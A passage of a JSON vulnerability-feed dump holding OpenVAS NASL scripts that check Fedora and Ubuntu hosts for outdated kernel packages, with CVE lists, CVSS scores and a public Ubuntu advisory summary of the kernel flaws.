value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-15241\");\n script_cve_id(\"CVE-2011-4081\", \"CVE-2011-4077\", \"CVE-2011-1083\", \"CVE-2011-2699\",\n \"CVE-2011-1161\", \"CVE-2011-3353\", \"CVE-2011-2918\", \"CVE-2011-3188\",\n \"CVE-2011-2723\", \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\",\n \"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\",\n \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\",\n \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\",\n \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\",\n \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-15241\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~103.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:17:55", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-28T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-18983", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-4082", "CVE-2010-4169", "CVE-2010-2963", "CVE-2010-4158", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-2071", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-3081", "CVE-2010-3067", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3079", "CVE-2010-3301"], "modified": "2017-12-19T00:00:00", "id": "OPENVAS:862749", "href": "http://plugins.openvas.org/nasl.php?oid=862749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-18983\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 13\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/052513.html\");\n script_id(862749);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-28 07:11:56 +0100 (Tue, 28 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-18983\");\n script_cve_id(\"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-3874\", \"CVE-2010-4162\", \"CVE-2010-4249\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3442\", \"CVE-2010-4258\", \"CVE-2010-4169\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\");\n script_name(\"Fedora Update for kernel FEDORA-2010-18983\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.7~66.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:27:17", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1119-1", "cvss3": {}, "published": "2011-05-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1119-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-3865", "CVE-2010-4529", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-4346", "CVE-2010-2955", "CVE-2010-3437", "CVE-2010-4527", "CVE-2010-2963", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-4158", "CVE-2010-3876", "CVE-2010-3850", "CVE-2010-3705", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-4079", "CVE-2010-4249", "CVE-2010-3081", "CVE-2010-4342", "CVE-2010-4164", "CVE-2010-2962", "CVE-2010-3873", "CVE-2010-3080", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-3861"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840651", "href": "http://plugins.openvas.org/nasl.php?oid=840651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1119_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1119-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dan Rosenberg discovered that the RDS network protocol did not correctly\n check certain parameters. A local attacker could exploit this gain root\n privileges. (CVE-2010-3904)\n\n Nelson Elhage discovered several problems with the Acorn Econet protocol\n driver. A local user could cause a denial of service via a NULL pointer\n dereference, escalate privileges by overflowing the kernel stack, and\n assign Econet addresses to arbitrary interfaces. (CVE-2010-3848,\n CVE-2010-3849, CVE-2010-3850)\n \n Ben Hawkes discovered that the Linux kernel did not correctly validate\n memory ranges on 64bit kernels when allocating memory on behalf of 32bit\n system calls. On a 64bit system, a local attacker could perform malicious\n multicast getsockopt calls to gain root privileges. (CVE-2010-3081)\n \n Tavis Ormandy discovered that the IRDA subsystem did not correctly shut\n down. A local attacker could exploit this to cause the system to crash or\n possibly gain root privileges. (CVE-2010-2954)\n \n Brad Spengler discovered that the wireless extensions did not correctly\n validate certain request sizes. A local attacker could exploit this to read\n portions of kernel memory, leading to a loss of privacy. (CVE-2010-2955)\n \n Tavis Ormandy discovered that the session keyring did not correctly check\n for its parent. On systems without a default session keyring, a local\n attacker could exploit this to crash the system, leading to a denial of\n service. (CVE-2010-2960)\n \n Kees Cook discovered that the Intel i915 graphics driver did not correctly\n validate memory regions. A local attacker with access to the video card\n could read and write arbitrary kernel memory to gain root privileges.\n (CVE-2010-2962)\n \n Kees Cook discovered that the V4L1 32bit compat interface did not correctly\n validate certain parameters. A local attacker on a 64bit system with access\n to a video device could exploit this to gain root privileges.\n (CVE-2010-2963)\n \n Robert Swiecki discovered that ftrace did not correctly handle mutexes. A\n local attacker could exploit this to crash the kernel, leading to a denial\n of service. (CVE-2010-3079)\n \n Tavis Ormandy discovered that the OSS sequencer device did not correctly\n shut down. A local attacker could exploit this to crash the system or\n possibly gain root privileges. (CVE-2010-3080)\n \n Dan Rosenberg discovered that the CD driver did not correctly check\n parameters. A local attacker could exploit this to read arbitrary kernel\n memory, leading to a loss of privacy. (CVE-2010-3437)\n \n Dan Rosenberg discovered that SCTP did not correctly handle HMAC\n calcu ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1119-1\";\ntag_affected = \"linux-ti-omap4 on Ubuntu 10.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1119-1/\");\n script_id(840651);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-10 14:04:15 +0200 (Tue, 10 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1119-1\");\n script_cve_id(\"CVE-2010-3904\", \"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\", \"CVE-2010-3081\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2960\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3437\", \"CVE-2010-3705\", \"CVE-2010-3861\", \"CVE-2010-3865\", \"CVE-2010-3873\", \"CVE-2010-3875\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-4072\", \"CVE-2010-4079\", \"CVE-2010-4158\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4249\", \"CVE-2010-4342\", \"CVE-2010-4346\", \"CVE-2010-4527\", \"CVE-2010-4529\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1119-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-903-omap4\", ver:\"2.6.35-903.22\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:39", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1119-1", "cvss3": {}, "published": "2011-05-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1119-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-3865", "CVE-2010-4529", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-4346", "CVE-2010-2955", "CVE-2010-3437", "CVE-2010-4527", "CVE-2010-2963", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-4158", "CVE-2010-3876", "CVE-2010-3850", "CVE-2010-3705", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-4079", "CVE-2010-4249", "CVE-2010-3081", "CVE-2010-4342", "CVE-2010-4164", "CVE-2010-2962", "CVE-2010-3873", "CVE-2010-3080", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-3861"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1119_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1119-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1119-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840651\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-10 14:04:15 +0200 (Tue, 10 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1119-1\");\n script_cve_id(\"CVE-2010-3904\", \"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\", \"CVE-2010-3081\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2960\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3437\", \"CVE-2010-3705\", \"CVE-2010-3861\", \"CVE-2010-3865\", \"CVE-2010-3873\", \"CVE-2010-3875\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-4072\", \"CVE-2010-4079\", \"CVE-2010-4158\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4249\", \"CVE-2010-4342\", \"CVE-2010-4346\", \"CVE-2010-4527\", \"CVE-2010-4529\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1119-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.10\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1119-1\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 10.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Dan Rosenberg discovered that the RDS network protocol did not correctly\n check certain parameters. A local attacker could exploit this gain root\n privileges. (CVE-2010-3904)\n\n Nelson Elhage discovered several problems with the Acorn Econet protocol\n driver. A local user could cause a denial of service via a NULL pointer\n dereference, escalate privileges by overflowing the kernel stack, and\n assign Econet addresses to arbitrary interfaces. (CVE-2010-3848,\n CVE-2010-3849, CVE-2010-3850)\n\n Ben Hawkes discovered that the Linux kernel did not correctly validate\n memory ranges on 64bit kernels when allocating memory on behalf of 32bit\n system calls. On a 64bit system, a local attacker could perform malicious\n multicast getsockopt calls to gain root privileges. (CVE-2010-3081)\n\n Tavis Ormandy discovered that the IRDA subsystem did not correctly shut\n down. A local attacker could exploit this to cause the system to crash or\n possibly gain root privileges. (CVE-2010-2954)\n\n Brad Spengler discovered that the wireless extensions did not correctly\n validate certain request sizes. A local attacker could exploit this to read\n portions of kernel memory, leading to a loss of privacy. (CVE-2010-2955)\n\n Tavis Ormandy discovered that the session keyring did not correctly check\n for its parent. On systems without a default session keyring, a local\n attacker could exploit this to crash the system, leading to a denial of\n service. (CVE-2010-2960)\n\n Kees Cook discovered that the Intel i915 graphics driver did not correctly\n validate memory regions. A local attacker with access to the video card\n could read and write arbitrary kernel memory to gain root privileges.\n (CVE-2010-2962)\n\n Kees Cook discovered that the V4L1 32bit compat interface did not correctly\n validate certain parameters. A local attacker on a 64bit system with access\n to a video device could exploit this to gain root privileges.\n (CVE-2010-2963)\n\n Robert Swiecki discovered that ftrace did not correctly handle mutexes. A\n local attacker could exploit this to crash the kernel, leading to a denial\n of service. (CVE-2010-3079)\n\n Tavis Ormandy discovered that the OSS sequencer device did not correctly\n shut down. A local attacker could exploit this to crash the system or\n possibly gain root privileges. (CVE-2010-3080)\n\n Dan Rosenberg discovered that the CD driver did not correctly check\n parameters. A local attacker could exploit this to read arbitrary kernel\n memory, leading to a loss of privacy. (CVE-2010-3437)\n\n Dan Rosenberg discovered that SCTP did not correctly handle HMAC\n calcu ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.35-903-omap4\", ver:\"2.6.35-903.22\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T16:18:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-12-02T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-16346", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-4110", "CVE-2011-1083", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2011-4132", "CVE-2010-3698", "CVE-2011-1161", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-3353", "CVE-2011-2905", "CVE-2011-4077", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-4326", "CVE-2011-4081", "CVE-2011-3191"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-16346\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/070272.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863647\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-02 13:22:20 +0530 (Fri, 02 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-16346\");\n script_cve_id(\"CVE-2011-4110\", \"CVE-2011-4326\", \"CVE-2011-4132\", \"CVE-2011-4081\",\n \"CVE-2011-4077\", \"CVE-2011-1083\", \"CVE-2011-2699\", \"CVE-2011-1161\",\n \"CVE-2011-3353\", \"CVE-2011-2918\", \"CVE-2011-3188\", \"CVE-2011-2723\",\n \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\", \"CVE-2011-2905\",\n \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\", \"CVE-2011-1770\",\n \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\",\n \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\",\n \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-16346\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~106.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:42", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-12-02T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-16346", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-4110", "CVE-2011-1083", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2011-4132", "CVE-2010-3698", "CVE-2011-1161", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-3353", "CVE-2011-2905", "CVE-2011-4077", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-4326", "CVE-2011-4081", "CVE-2011-3191"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863647", "href": "http://plugins.openvas.org/nasl.php?oid=863647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-16346\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/070272.html\");\n script_id(863647);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-02 13:22:20 +0530 (Fri, 02 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-16346\");\n script_cve_id(\"CVE-2011-4110\", \"CVE-2011-4326\", \"CVE-2011-4132\", \"CVE-2011-4081\",\n \"CVE-2011-4077\", \"CVE-2011-1083\", \"CVE-2011-2699\", \"CVE-2011-1161\",\n \"CVE-2011-3353\", \"CVE-2011-2918\", \"CVE-2011-3188\", \"CVE-2011-2723\",\n \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\", \"CVE-2011-2905\",\n \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\", \"CVE-2011-1770\",\n \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\",\n \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\",\n \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-16346\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", 